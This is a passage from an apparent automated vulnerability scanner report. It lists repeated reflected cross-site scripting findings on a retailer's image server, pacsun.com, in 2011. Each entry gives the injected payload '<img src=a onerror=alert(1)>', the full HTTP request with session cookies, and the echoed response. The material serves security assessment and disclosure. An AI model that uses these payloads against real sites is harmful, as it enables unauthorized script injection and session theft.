Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:55 GMT
Connection: close

Unable to find /pacsunproducts/8861239_013f5bb<img src=a onerror=alert(1)>a491f4508bc

3.228. http://images3.pacsun.com/is/image/pacsunproducts/8863946_01_804 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8863946_01_804

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7a1c3<img%20src%3da%20onerror%3dalert(1)>6af960c4dea was submitted in the REST URL parameter 4. This input was echoed as 7a1c3<img src=a onerror=alert(1)>6af960c4dea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8863946_01_8047a1c3<img%20src%3da%20onerror%3dalert(1)>6af960c4dea?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:25 GMT
Connection: close

Unable to find /pacsunproducts/8863946_01_8047a1c3<img src=a onerror=alert(1)>6af960c4dea

3.229. http://images3.pacsun.com/is/image/pacsunproducts/8863946_sw_001 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8863946_sw_001

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload a75b5<img%20src%3da%20onerror%3dalert(1)>0581d48490f was submitted in the REST URL parameter 4. This input was echoed as a75b5<img src=a onerror=alert(1)>0581d48490f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8863946_sw_001a75b5<img%20src%3da%20onerror%3dalert(1)>0581d48490f?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:22 GMT
Connection: close

Unable to find /pacsunproducts/8863946_sw_001a75b5<img src=a onerror=alert(1)>0581d48490f

3.230. http://images3.pacsun.com/is/image/pacsunproducts/8863946_sw_011 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8863946_sw_011

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 48a06<img%20src%3da%20onerror%3dalert(1)>08df469c4e0 was submitted in the REST URL parameter 4. This input was echoed as 48a06<img src=a onerror=alert(1)>08df469c4e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8863946_sw_01148a06<img%20src%3da%20onerror%3dalert(1)>08df469c4e0?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:23 GMT
Connection: close

Unable to find /pacsunproducts/8863946_sw_01148a06<img src=a onerror=alert(1)>08df469c4e0

3.231. http://images3.pacsun.com/is/image/pacsunproducts/8863946_sw_804 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8863946_sw_804

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 3c7e2<img%20src%3da%20onerror%3dalert(1)>7e69ac8974 was submitted in the REST URL parameter 4. This input was echoed as 3c7e2<img src=a onerror=alert(1)>7e69ac8974 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8863946_sw_8043c7e2<img%20src%3da%20onerror%3dalert(1)>7e69ac8974?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 88
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:24 GMT
Connection: close

Unable to find /pacsunproducts/8863946_sw_8043c7e2<img src=a onerror=alert(1)>7e69ac8974

3.232. http://images3.pacsun.com/is/image/pacsunproducts/8868382_01_066 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8868382_01_066

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload aa815<img%20src%3da%20onerror%3dalert(1)>53559da58d7 was submitted in the REST URL parameter 4. This input was echoed as aa815<img src=a onerror=alert(1)>53559da58d7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8868382_01_066aa815<img%20src%3da%20onerror%3dalert(1)>53559da58d7?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:24 GMT
Connection: close

Unable to find /pacsunproducts/8868382_01_066aa815<img src=a onerror=alert(1)>53559da58d7

3.233. http://images3.pacsun.com/is/image/pacsunproducts/8868382_sw_054 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8868382_sw_054

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e7502<img%20src%3da%20onerror%3dalert(1)>07e6cff3556 was submitted in the REST URL parameter 4. This input was echoed as e7502<img src=a onerror=alert(1)>07e6cff3556 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8868382_sw_054e7502<img%20src%3da%20onerror%3dalert(1)>07e6cff3556?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:22 GMT
Connection: close

Unable to find /pacsunproducts/8868382_sw_054e7502<img src=a onerror=alert(1)>07e6cff3556

3.234. http://images3.pacsun.com/is/image/pacsunproducts/8868382_sw_066 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8868382_sw_066

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 65aeb<img%20src%3da%20onerror%3dalert(1)>0fc86ecbee1 was submitted in the REST URL parameter 4. This input was echoed as 65aeb<img src=a onerror=alert(1)>0fc86ecbee1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8868382_sw_06665aeb<img%20src%3da%20onerror%3dalert(1)>0fc86ecbee1?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:22 GMT
Connection: close

Unable to find /pacsunproducts/8868382_sw_06665aeb<img src=a onerror=alert(1)>0fc86ecbee1

3.235. http://images3.pacsun.com/is/image/pacsunproducts/8878167_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8878167_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 985a8<img%20src%3da%20onerror%3dalert(1)>e780e45a551 was submitted in the REST URL parameter 4. This input was echoed as 985a8<img src=a onerror=alert(1)>e780e45a551 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8878167_01985a8<img%20src%3da%20onerror%3dalert(1)>e780e45a551?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:51 GMT
Connection: close

Unable to find /pacsunproducts/8878167_01985a8<img src=a onerror=alert(1)>e780e45a551

3.236. http://images3.pacsun.com/is/image/pacsunproducts/8878225_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8878225_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f6019<img%20src%3da%20onerror%3dalert(1)>b1a0c8122d5 was submitted in the REST URL parameter 4. This input was echoed as f6019<img src=a onerror=alert(1)>b1a0c8122d5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8878225_01f6019<img%20src%3da%20onerror%3dalert(1)>b1a0c8122d5?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:15 GMT
Connection: close

Unable to find /pacsunproducts/8878225_01f6019<img src=a onerror=alert(1)>b1a0c8122d5

3.237. http://images3.pacsun.com/is/image/pacsunproducts/8886004_01_516 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8886004_01_516

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 77a6a<img%20src%3da%20onerror%3dalert(1)>0e187afc1a3 was submitted in the REST URL parameter 4. This input was echoed as 77a6a<img src=a onerror=alert(1)>0e187afc1a3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8886004_01_51677a6a<img%20src%3da%20onerror%3dalert(1)>0e187afc1a3?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:20 GMT
Connection: close

Unable to find /pacsunproducts/8886004_01_51677a6a<img src=a onerror=alert(1)>0e187afc1a3

3.238. http://images3.pacsun.com/is/image/pacsunproducts/8886004_sw_003 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8886004_sw_003

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 52c6b<img%20src%3da%20onerror%3dalert(1)>7e246c89ffb was submitted in the REST URL parameter 4. This input was echoed as 52c6b<img src=a onerror=alert(1)>7e246c89ffb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8886004_sw_00352c6b<img%20src%3da%20onerror%3dalert(1)>7e246c89ffb?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:15 GMT
Connection: close

Unable to find /pacsunproducts/8886004_sw_00352c6b<img src=a onerror=alert(1)>7e246c89ffb

3.239. http://images3.pacsun.com/is/image/pacsunproducts/8886004_sw_516 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8886004_sw_516

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8c474<img%20src%3da%20onerror%3dalert(1)>6ecf10dfb31 was submitted in the REST URL parameter 4. This input was echoed as 8c474<img src=a onerror=alert(1)>6ecf10dfb31 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8886004_sw_5168c474<img%20src%3da%20onerror%3dalert(1)>6ecf10dfb31?$11_product_swatch$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
